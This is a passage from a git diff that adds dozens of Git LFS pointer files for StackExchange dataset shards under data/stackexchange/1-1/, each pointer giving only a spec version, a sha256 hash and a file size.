a/data/stackexchange/1-1/1964_2289.jsonl b/data/stackexchange/1-1/1964_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e12a30c84e6d8a624dc60232a0fd065d628ec13 --- /dev/null +++ b/data/stackexchange/1-1/1964_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:614391bfcc3c576543d137fb8a18f8f2e6d906598f96b7b45f925f833e9ecbcc +size 37705282 diff --git a/data/stackexchange/1-1/1965_2289.jsonl b/data/stackexchange/1-1/1965_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..68652d532771d70e57f9c072b8856c83ce45d3e5 --- /dev/null +++ b/data/stackexchange/1-1/1965_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46d9948a17d70405e59bc799b076e8b021db3be7c96b58580476cb79185be423 +size 37873748 diff --git a/data/stackexchange/1-1/1966_2289.jsonl b/data/stackexchange/1-1/1966_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fa0c9bc1206412be70bd5ef2f627a131680da3f --- /dev/null +++ b/data/stackexchange/1-1/1966_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82f56597734d580679d0e85e415ad5ee226779ae511da6276993987b2e60167b +size 37957564 diff --git a/data/stackexchange/1-1/1967_2289.jsonl b/data/stackexchange/1-1/1967_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..03a9135e5b2f00417fbe4a014e746ff2d783f2a4 --- /dev/null +++ b/data/stackexchange/1-1/1967_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8aa055791b743ee20185b7d90dccfb35bb87c29b0352e973cc286a1b8313640f +size 37725111 diff --git a/data/stackexchange/1-1/1968_2289.jsonl b/data/stackexchange/1-1/1968_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..140d446c2579cdc41d815285cc7585d1dc64e8e8 --- /dev/null +++ b/data/stackexchange/1-1/1968_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:476b538b1b0dfa77f8da5748f8f6b62093c30e09dc90e832ceb6217f51877046 +size 37898857 diff --git a/data/stackexchange/1-1/1969_2289.jsonl b/data/stackexchange/1-1/1969_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5decb5876c948393dd4cb618ea73fee7dfeca312 --- /dev/null +++ b/data/stackexchange/1-1/1969_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe5bb5d92aad17d9493ba740eddd1f7a0fa1b3b2182284dc5fcc9754637a93b9 +size 38158918 diff --git a/data/stackexchange/1-1/196_2289.jsonl b/data/stackexchange/1-1/196_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0f4747c3759e5006412206a3e73f82f2d1686e4 --- /dev/null +++ b/data/stackexchange/1-1/196_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c80122b6dea4f3fe903b7d4813b975191f25521627da116668ace9df8363ef36 +size 35543630 diff --git a/data/stackexchange/1-1/1970_2289.jsonl b/data/stackexchange/1-1/1970_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f65eaa584d8cda14a9e46e65128a01f1f5e2795 --- /dev/null +++ b/data/stackexchange/1-1/1970_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bba6ae5b1774126a2de2b62e66e7d65b8415157426540d28360b3fc6399cd21c +size 38042921 diff --git a/data/stackexchange/1-1/1971_2289.jsonl b/data/stackexchange/1-1/1971_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1cd6a2a1f86a75d2f9100991f131aa84f967099 --- /dev/null +++ b/data/stackexchange/1-1/1971_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0bb81d0d68cc170195916d3d586d940230073be71a68bc6d670d6c6891e9927 +size 37154815 diff --git a/data/stackexchange/1-1/1972_2289.jsonl b/data/stackexchange/1-1/1972_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..f7c9fdc6b770b1f8350d47a9e8153f3a02f5d7cb --- /dev/null +++ b/data/stackexchange/1-1/1972_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3b47f8e7014f476fba608cf4fe6b1ada8363060a13b6634914fbf38b444d739 +size 38085128 diff --git a/data/stackexchange/1-1/1973_2289.jsonl b/data/stackexchange/1-1/1973_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60929a4dd7f652e16afa82d4f52e67d91f94ffff --- /dev/null +++ b/data/stackexchange/1-1/1973_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7492430815e6dcb4cebf6ef3d6f7cfc5a911cc11009fdf4976cd26d81c3cfc7 +size 38031588 diff --git a/data/stackexchange/1-1/1974_2289.jsonl b/data/stackexchange/1-1/1974_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c96b19026c054ae25bb472608309aba780fdd40 --- /dev/null +++ b/data/stackexchange/1-1/1974_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f731d4d8dd5357e75cb19e00389b5619246cb596e9a648ddb864d27c1632b589 +size 38002041 diff --git a/data/stackexchange/1-1/1975_2289.jsonl b/data/stackexchange/1-1/1975_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3fc2eab1bca6c266f5f0d2ffceb26c32bad15867 --- /dev/null +++ b/data/stackexchange/1-1/1975_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73461cdb501d5a5d18cc13a7804482131fe16b01571892d7fff141692d5a9c79 +size 38690455 diff --git a/data/stackexchange/1-1/1976_2289.jsonl b/data/stackexchange/1-1/1976_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62d6050a4f4c957c4a74febfa5f57e8edc1d73b0 --- /dev/null +++ b/data/stackexchange/1-1/1976_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:35da1d3a7c109c291a498cd09709756cf1a624fbb6bb13d763f117e56abf4362 +size 38219229 diff --git a/data/stackexchange/1-1/1977_2289.jsonl b/data/stackexchange/1-1/1977_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32744cfb75327b85b5608349b9f3f8c70e7938f7 --- /dev/null +++ b/data/stackexchange/1-1/1977_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec07f5ba64cc1e8367b2718b9bc41df1c801d0495b8149d57b72e9436185031a +size 37935390 diff --git a/data/stackexchange/1-1/1978_2289.jsonl b/data/stackexchange/1-1/1978_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..848d8810b5b83c221a540eecdcd7be61dc683401 --- /dev/null +++ b/data/stackexchange/1-1/1978_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca8b3dae681b350c6209bc348808764feb41f9112d2ec24171c5d6eceabdcbd6 +size 37795926 diff --git a/data/stackexchange/1-1/1979_2289.jsonl b/data/stackexchange/1-1/1979_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..430fde51b55e93a0061f99cf8564dba6db356014 --- /dev/null +++ b/data/stackexchange/1-1/1979_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce2df49bf473b5c3a4e02b807c8d5bf25dcbc4b95f9284e1851ba13d3e8f69a5 +size 38226926 diff --git a/data/stackexchange/1-1/197_2289.jsonl b/data/stackexchange/1-1/197_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..47a984a4300f93c1f4df513fac41e742986cb19f --- /dev/null +++ b/data/stackexchange/1-1/197_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:5a60bcd60f0f34def2b9c75c6d3439c56871afc5b9157e7be1602d1c8aff505a +size 34917411 diff --git a/data/stackexchange/1-1/1980_2289.jsonl b/data/stackexchange/1-1/1980_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c64bfdd4d1c1e13dff4c7be02e3687764905b723 --- /dev/null +++ b/data/stackexchange/1-1/1980_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c95e92337d40779e653be5688fe255934da95d2c04aafb55bc13038d88ca01a +size 38629662 diff --git a/data/stackexchange/1-1/1981_2289.jsonl b/data/stackexchange/1-1/1981_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d15796e4577f2f5b375332704afc75f7fff1130 --- /dev/null +++ b/data/stackexchange/1-1/1981_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7bc0fe4fd92e0c76a8b51e5a0d70df45d3d2ba92a9e85f7b723cbc59e3d9ff3 +size 38222690 diff --git a/data/stackexchange/1-1/1982_2289.jsonl b/data/stackexchange/1-1/1982_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39d8bda99501e5555427b555458308211cd0a7ed --- /dev/null +++ b/data/stackexchange/1-1/1982_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63eff2aac3c987f74af0d1da3bdb2cb5e0d6b4de777afda4f4469b2f271ad88b +size 37840634 diff --git a/data/stackexchange/1-1/1983_2289.jsonl b/data/stackexchange/1-1/1983_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98a37765d5828ef20775a420dcc99d6da850ad1d --- /dev/null +++ b/data/stackexchange/1-1/1983_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e275f2e0b1294d4eb01a286ddbe15e3884e17ec9345ead76557b13f8be03c56 +size 37565472 diff --git a/data/stackexchange/1-1/1984_2289.jsonl b/data/stackexchange/1-1/1984_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dff0e88542af8cb1138b130005bbe0f87e99a7bc --- /dev/null +++ b/data/stackexchange/1-1/1984_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31a9823debdf4734808fce4112457417b3700c98109255f5a18abed026e92b59 +size 38274329 diff --git a/data/stackexchange/1-1/1985_2289.jsonl b/data/stackexchange/1-1/1985_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f489aac43541a9c3cd92d8644015b06424eb42b9 --- /dev/null +++ b/data/stackexchange/1-1/1985_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:016d612f18b0239b8db2cab84a4c1f0d431998aa97765c9d9d188dd159ebb711 +size 37247879 diff --git a/data/stackexchange/1-1/1986_2289.jsonl b/data/stackexchange/1-1/1986_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..889a7faaae24a851edbb96bd459c8b9df50f71fa --- /dev/null +++ b/data/stackexchange/1-1/1986_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9932b4d34693de9590b6407add49e0da11507e38f27a7ed585110ec2e60afdca +size 38192858 diff --git a/data/stackexchange/1-1/1987_2289.jsonl b/data/stackexchange/1-1/1987_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c6e32ad2d4409013af8cba75876d999153e15c6e --- /dev/null +++ b/data/stackexchange/1-1/1987_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:de15bcd152dd00bbac41f4f17669107eb918dc840403c8b3d07fe234c69b8cbd +size 38066212 diff --git a/data/stackexchange/1-1/1988_2289.jsonl b/data/stackexchange/1-1/1988_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..aab212d5f60b98971ef6e235c9d0ae999bc96788 --- /dev/null +++ b/data/stackexchange/1-1/1988_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e506a3b3f6c545d62937ba2d491a972e3ab362ab9f3a4c4554fdd2ed4a3f28b +size 37807735 diff --git a/data/stackexchange/1-1/1989_2289.jsonl b/data/stackexchange/1-1/1989_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d191481a32b12dbbb06062a04786391f3b12fdcb --- /dev/null +++ b/data/stackexchange/1-1/1989_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8646bb4f12bd9f34d8a69de2dc6dc4ea4a0413ef3a883115d4ae17818f7b264d +size 40421282 diff --git a/data/stackexchange/1-1/198_2289.jsonl b/data/stackexchange/1-1/198_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1f5e8ce98b82f15c56fe018d1d064e4fc2e951e4 --- /dev/null +++ b/data/stackexchange/1-1/198_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8142b7efb0dfea36c39db8b1881ebd2cdac54758bd59ce57229c88b836c13d0a +size 35310316 diff --git a/data/stackexchange/1-1/1990_2289.jsonl b/data/stackexchange/1-1/1990_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ccad9f5af7048be6215144e71b6cacfaf82f0b0 --- /dev/null +++ b/data/stackexchange/1-1/1990_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4dd62c6fe31b6ab9bd06cae1735c0546ade3f404e34d760b023f4208f6d8139b +size 40141571 diff --git a/data/stackexchange/1-1/1991_2289.jsonl b/data/stackexchange/1-1/1991_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2b2d3b4870bc3de496a98cdd63dbc5635683249 --- /dev/null +++ b/data/stackexchange/1-1/1991_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8503271933c2aca86ee7b21414e0a4a8c8b8070081947b8eef0658c322cbd10c +size 41418021 diff --git a/data/stackexchange/1-1/1992_2289.jsonl b/data/stackexchange/1-1/1992_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7620ec77a9d80ad58cb54705a80cd13088499109 --- /dev/null +++ b/data/stackexchange/1-1/1992_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75c3afe3e0415f96c10d64c6ae454668b30cfa97e6b5069d69284a879f2d457e +size 39949968 diff --git a/data/stackexchange/1-1/1993_2289.jsonl b/data/stackexchange/1-1/1993_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4e15081b664cf244459c88dca6c4833d4376c56 --- /dev/null +++ b/data/stackexchange/1-1/1993_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c81766a0bb3c19bd53230a75228f68a5c3e1ec18468263e36e0c6e7c3c5ae490 +size 48585347 diff --git a/data/stackexchange/1-1/1994_2289.jsonl b/data/stackexchange/1-1/1994_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61dfd4db0f568209f5e09d299460cfee9db460f5 --- /dev/null +++ b/data/stackexchange/1-1/1994_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb877cde805046421298e1e3f3f85b52b150c41e598ea94280b19c430d5c3290 +size 39940924 diff --git a/data/stackexchange/1-1/1995_2289.jsonl b/data/stackexchange/1-1/1995_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0b494394aafc452baf3b6b36f702ec951f5bc121 --- /dev/null +++ b/data/stackexchange/1-1/1995_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:c5507d7c45ce9380115cebe21cc88f381e1de23416f3ccc6f9b61de80b2b4133 +size 41136355 diff --git a/data/stackexchange/1-1/1996_2289.jsonl b/data/stackexchange/1-1/1996_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a8255915a1aa8b78639ee0c2a29be66b3bc4385e --- /dev/null +++ b/data/stackexchange/1-1/1996_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03377b729ac74fc6dc8c6c7c0b95c6284562a0f7860379a9c5744f65794c8287 +size 39807456 diff --git a/data/stackexchange/1-1/1997_2289.jsonl b/data/stackexchange/1-1/1997_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f533f758ce1dcc17b966d211c6c57f5a5bcbf1c7 --- /dev/null +++ b/data/stackexchange/1-1/1997_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53ea62bf9e4b63669350cccad22b4a97288d5d98dd22194474ca46a5d6afa0e1 +size 41113981 diff --git a/data/stackexchange/1-1/1998_2289.jsonl b/data/stackexchange/1-1/1998_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b684de4b3aee89d8b37aad9d4af69bbb6699fbf --- /dev/null +++ b/data/stackexchange/1-1/1998_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19890e58eeeb79d5f17341eb4685bb96d7108173b79c7508ea93ac71d5d35ae3 +size 40005952 diff --git a/data/stackexchange/1-1/1999_2289.jsonl b/data/stackexchange/1-1/1999_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec7d7e86753d784b96f6013c7b5d2d88a3fb364a --- /dev/null +++ b/data/stackexchange/1-1/1999_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ffe495c9a770f0a9003c33d65acae4c295b9cf964f889e7f013709409e8ee64 +size 41932231 diff --git a/data/stackexchange/1-1/199_2289.jsonl b/data/stackexchange/1-1/199_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df9129e78967df04b654c002bd5fdcc39a1dea89 --- /dev/null +++ b/data/stackexchange/1-1/199_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe9209364fc540be901433185f373c4d5b17881df78439a119519efd30f4d398 +size 34685531 diff --git a/data/stackexchange/1-1/19_2289.jsonl b/data/stackexchange/1-1/19_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e8d6ed04076914ef01bceada6305191679f8f25 --- /dev/null +++ b/data/stackexchange/1-1/19_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a076fee50cb77ac614d5c7a68e24984527e4bd1688012bf729a5e4a2e3828cf +size 35194489 diff --git a/data/stackexchange/1-1/1_2289.jsonl b/data/stackexchange/1-1/1_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a70661c8068eb304b7767c82d01e427b52fd6bea --- /dev/null +++ b/data/stackexchange/1-1/1_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e64872aab9b54aa7bbc20abf2e12646d238960e45ae67102ad0dae64017d12d2 +size 35410999 diff --git a/data/stackexchange/1-1/2000_2289.jsonl b/data/stackexchange/1-1/2000_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b7f008e4388bb2239d962e7bddfc131fbfce934 --- /dev/null +++ b/data/stackexchange/1-1/2000_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19aaa1efdab3832d9ad0e188bc98a43f0022b3c73df987d4d3808b16f0d2029b +size 39730689 diff --git a/data/stackexchange/1-1/2001_2289.jsonl b/data/stackexchange/1-1/2001_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..744a765235960734dcb670e18bf90968f8e5307c --- /dev/null +++ b/data/stackexchange/1-1/2001_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0bbeb35f9905bc0633d88284f68795253cb17a5be24c55d28a0a4b7c38f085d +size 40202927 diff --git a/data/stackexchange/1-1/2002_2289.jsonl b/data/stackexchange/1-1/2002_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..074aed5faae44f822e9ca2844a92b0c3849a2c22 --- /dev/null +++ b/data/stackexchange/1-1/2002_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b0bb58fcfa32e499cb56c3a06a4b923ff7493cda7c3272bb72fabe28f7fd7bc +size 40020587 diff --git a/data/stackexchange/1-1/2003_2289.jsonl b/data/stackexchange/1-1/2003_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1d7ffad0e76a2e2c07f572f23dcb44672a73cd9 --- /dev/null +++ b/data/stackexchange/1-1/2003_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba96d8422b73b937f14305827e42d1d642bc12f4a1140d790d2db3d323c83448 +size 41065357 diff --git a/data/stackexchange/1-1/2004_2289.jsonl b/data/stackexchange/1-1/2004_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b0ce863c0e06b558f9cae2678ee10c556f386ec6 --- /dev/null +++ b/data/stackexchange/1-1/2004_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:24c47f1c2842147c88fa2911b0d3f51fbce3fbbd2c964828fbd22241ce934930 +size 41228349 diff --git a/data/stackexchange/1-1/2005_2289.jsonl b/data/stackexchange/1-1/2005_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69a656cfb294f8740378972e8d0c63e0161ec3ba --- /dev/null +++ b/data/stackexchange/1-1/2005_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f06a3e0496d2a07fadd8f894663349757c646fe9e98e934798996e4aa09a20df +size 39521646 diff --git a/data/stackexchange/1-1/2006_2289.jsonl b/data/stackexchange/1-1/2006_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1700f8261624d56f029e2244a2df531d1a86dcc --- /dev/null +++ b/data/stackexchange/1-1/2006_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa97d7ccdb69ec37a2d6ce582218a233bfce791f302ddc8a99bb2dd8a93dad57 +size 40485125 diff --git a/data/stackexchange/1-1/2007_2289.jsonl b/data/stackexchange/1-1/2007_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c536829b9faaf4cf282699095c9b30448b08f12d --- /dev/null +++ b/data/stackexchange/1-1/2007_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b7cca755b1e3383c4f2141ca97a30b213f3eac254ede75a3a4fd32388bd7f49 +size 40542566 diff --git a/data/stackexchange/1-1/2008_2289.jsonl b/data/stackexchange/1-1/2008_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..01c68cbf10a9ef4b1c603fc81c2bf4d3615cfdf5 --- /dev/null +++ b/data/stackexchange/1-1/2008_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9d5615544d648270887f987509f0a484ab1aade0937b768e868f4471f0cbf8f +size 38705310 diff --git a/data/stackexchange/1-1/2009_2289.jsonl b/data/stackexchange/1-1/2009_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..113d1e66ee0cef990b765331049371cc48342190 --- /dev/null +++ b/data/stackexchange/1-1/2009_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:932ebe637f81663d4cb4e59eb4ec2b3a1832a5fe863132a4d5c8d082388f301b +size 39824436 diff --git a/data/stackexchange/1-1/200_2289.jsonl b/data/stackexchange/1-1/200_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8822ca9ee6f1ac44dfc2354b8e5c01da330c21d5 --- /dev/null +++ b/data/stackexchange/1-1/200_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d6aa82c21810fb00665809205b1965d9f3bc4bc291e03f5466f4ac588aa0709 +size 37946954 diff --git a/data/stackexchange/1-1/2010_2289.jsonl b/data/stackexchange/1-1/2010_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1727df09dfca02cbb9773cf5c0adbcded37e4f73 --- /dev/null +++ b/data/stackexchange/1-1/2010_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4a967e2791146535a98b0284b25cf9aed921af163f4c70da64d2b566b501c70 +size 40556997 diff --git a/data/stackexchange/1-1/2011_2289.jsonl b/data/stackexchange/1-1/2011_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ef801301ba3aabaaca05d9c5edd31fa6f73bd35 --- /dev/null +++ b/data/stackexchange/1-1/2011_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:321aca673a1389b7e48cd5ed1b6d6e0dd3b4a3366178eab440c79559867e5e88 +size 39339244 diff --git a/data/stackexchange/1-1/2012_2289.jsonl b/data/stackexchange/1-1/2012_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f17f766580225d7ca885175f7cd1d441b8b6f63 --- /dev/null +++ b/data/stackexchange/1-1/2012_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83dce5e6924adc80eee2db52b745a3b13cfdd8f2346e09aca85c54312c84ccc3 +size 39464309 diff --git a/data/stackexchange/1-1/2013_2289.jsonl b/data/stackexchange/1-1/2013_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..45d607118745304948adc534efbc4ca1ca45744f --- /dev/null +++ b/data/stackexchange/1-1/2013_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:729e61849fa181306ec3449b6f7443a06358ebaaeacf4792d17727c331efeaf1 +size 40194295 diff --git a/data/stackexchange/1-1/2014_2289.jsonl b/data/stackexchange/1-1/2014_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb488c8213264e7e8409b9100963561a9d96504e --- /dev/null +++ b/data/stackexchange/1-1/2014_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c9a2396041a3d51f9af2c2b6b0403f6127cb1aa61ada4458d07dee736707669 +size 42276242 diff --git a/data/stackexchange/1-1/2015_2289.jsonl b/data/stackexchange/1-1/2015_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2397e934b1064fdb53c132fb5cba5ee4de18101d --- /dev/null +++ b/data/stackexchange/1-1/2015_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e53d54132e650b73d75571f72631578075b991bc014ac30408fc0df64c6e9c2a +size 40448715 diff --git a/data/stackexchange/1-1/2016_2289.jsonl b/data/stackexchange/1-1/2016_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4681b181f9208d518e537a706421a00b062c845 --- /dev/null +++ b/data/stackexchange/1-1/2016_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da5f324c8af0434bb2ce8127f68b03f1c1814e14da77d21d464ea90555b4159d +size 40639481 diff --git a/data/stackexchange/1-1/2017_2289.jsonl b/data/stackexchange/1-1/2017_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..dd772f1183e45f31791a195e86d7a608205084c0 --- /dev/null +++ b/data/stackexchange/1-1/2017_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7eef1de15ec100a9bbb1cf5025b9be5e5242fb979080e3227a5e37f0aa93653d +size 39027003 diff --git a/data/stackexchange/1-1/2018_2289.jsonl b/data/stackexchange/1-1/2018_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2bd4368ccae42828a3fd4edc8a1ee75a4657a1b --- /dev/null +++ b/data/stackexchange/1-1/2018_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfcd8f75630108f0d09a78818321aed0c86f099e1453a9c602121d9adb6f3cf7 +size 40503930 diff --git a/data/stackexchange/1-1/2019_2289.jsonl b/data/stackexchange/1-1/2019_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cffa6a69363ae9d0b7995d260934813ee138fb9d --- /dev/null +++ b/data/stackexchange/1-1/2019_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5182b8aad4442ff123de0fe4d5d4b844ab975f4cd0539f95e4b20db542082619 +size 40504944 diff --git a/data/stackexchange/1-1/201_2289.jsonl b/data/stackexchange/1-1/201_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74905af701e3c9952883088fe4ce305194c94bbd --- /dev/null +++ b/data/stackexchange/1-1/201_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23f5084d56c7545df3c363d31a7760c21c9668cb599ccd1b352ae82e6998201a +size 38090839 diff --git a/data/stackexchange/1-1/2020_2289.jsonl b/data/stackexchange/1-1/2020_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5cdf35a08da1417d657edeefe6cfa110e99f8400 --- /dev/null +++ b/data/stackexchange/1-1/2020_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03e6046119538f8b1bd3068f78755fefa81ffeaf0c5495e1c815a46f675d47f8 +size 40667410 diff --git a/data/stackexchange/1-1/2021_2289.jsonl b/data/stackexchange/1-1/2021_2289.jsonl new file mode 100644 